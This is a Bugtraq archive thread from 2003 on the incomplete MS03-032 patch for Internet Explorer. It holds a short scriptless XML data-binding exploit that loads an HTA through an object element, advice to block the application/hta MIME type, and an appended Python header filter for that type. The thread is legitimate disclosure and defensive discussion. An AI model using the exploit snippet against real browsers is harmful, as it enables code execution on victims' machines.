Bugtraq mailing list archives
RE: BAD NEWS: Microsoft Security Bulletin MS03-032
From: "Drew Copley" <dcopley () eeye com>
Date: Mon, 8 Sep 2003 14:55:14 -0700
Some AV will catch these because of malware's exploit code which he has reused. Some AV will catch this because of greymagic's exploit code. Which is all fine and good, a bit like a magic trick. Yes, the demonstration exploit is caught... But the worm or trojan exploit someone maliciously sends to your system -- this won't be caught.

The only sure way to detect this, I already wrote about [to Bugtraq]. That is by setting a firewall rule which blocks the dangerous mimetype string [Content-Type: application/hta]. Everything else in the exploit can change.

But, why merely detect it and risk encoded and other types of AV/IDS/IPS evading techniques? Why not just do this fix? I think, ultimately, it depends on how safe you want to be. Some people do not mind having their systems be at risk. That is their choice.
-----Original Message-----
From: ADBecker () chmortgage com [mailto:ADBecker () chmortgage com]
Sent: Monday, September 08, 2003 12:17 PM
To: GreyMagic Software
Cc: Bugtraq; full-disclosure () lists netsys com; http-equiv () excite com; NTBugtraq; Microsoft Security Response Center; vulnwatch () vulnwatch org
Subject: RE: BAD NEWS: Microsoft Security Bulletin MS03-032

Updated antivirus software should catch this exploit and prevent any application from being launched. We have McAfee VirusScan 7 Ent. which caught both exploit examples at http://greymagic.com/adv/gm001-ie/

Andrew Becker
C.H. Mortgage, D.R. Horton
Phoenix IT/MIS Department
Phone: (866) 639-7305
Fax: (480) 607-5383

"GreyMagic Software" <security@greymagic.com>
09/08/03 07:52 AM
To: "NTBugtraq" <NTBUGTRAQ () LISTSERV NTBUGTRAQ COM>, "Bugtraq" <bugtraq () securityfocus com>, <full-disclosure () lists netsys com>, <vulnwatch () vulnwatch org>
cc: <http-equiv () excite com>, "Microsoft Security Response Center" <secure () microsoft com>, (bcc: Andrew D Becker/Continental Homes)
Subject: RE: BAD NEWS: Microsoft Security Bulletin MS03-032

The patch for Drew's object data=funky.hta doesn't work:

This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which explains the problem in detail. Microsoft again patches the object element in HTML, but it doesn't patch the dynamic version of that same element.

1. Disable Active Scripting

This actually means that no scripting is needed at all in order to exploit this amazingly critical vulnerability:

    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
    <security>
    <exploit>
    <![CDATA[ <object data=x.asp></object> ]]>
    </exploit>
    </security>
    </xml>

Ouch.
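The Content-Type check described in the message above, as an added example that is not part of the original posts: a sketch of the match a filtering proxy could apply to HTTP response headers, normalising header case, whitespace, folded lines and parameters before comparing. The function names and the sample responses are constructed for illustration.

```python
import re

# MIME type the message above says to block at the perimeter.
BLOCKED_TYPES = {"application/hta"}

def content_types(raw_response: bytes) -> list:
    """Return every Content-Type media type in the header block, normalised."""
    # Only the header block is inspected; the body is never searched.
    head = raw_response.split(b"\r\n\r\n", 1)[0].split(b"\n\n", 1)[0]
    # Unfold continuation lines (line break followed by space or tab).
    head = re.sub(rb"\r?\n[ \t]+", b" ", head)
    found = []
    for line in re.split(rb"\r?\n", head)[1:]:  # [1:] skips the status line
        name, sep, value = line.partition(b":")
        # Header names are case-insensitive, so compare in lower case.
        if sep and name.strip().lower() == b"content-type":
            media = value.split(b";", 1)[0]  # drop parameters such as charset
            found.append(media.decode("latin-1").strip().strip('"').lower())
    return found

def should_block(raw_response: bytes) -> bool:
    """True if any Content-Type header (duplicates included) is blocked."""
    return any(t in BLOCKED_TYPES for t in content_types(raw_response))

# Constructed sample responses, not captured traffic.
SAMPLES = {
    "plain": b"HTTP/1.1 200 OK\r\nContent-Type: application/hta\r\n\r\nbody",
    "mixed_case": b"HTTP/1.1 200 OK\r\ncontent-TYPE:   Application/HTA ; charset=x\r\n\r\n",
    "folded": b"HTTP/1.1 200 OK\r\nContent-Type:\r\n\tapplication/hta\r\n\r\n",
    "duplicate": b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                 b"Content-Type: application/hta\r\n\r\n",
    "benign": b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<p>application/hta</p>",
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, content_types(raw), "BLOCK" if should_block(raw) else "pass")
```

The check only sees traffic the proxy can read in clear text, so it complements the patch and workaround discussed in the thread rather than replacing them.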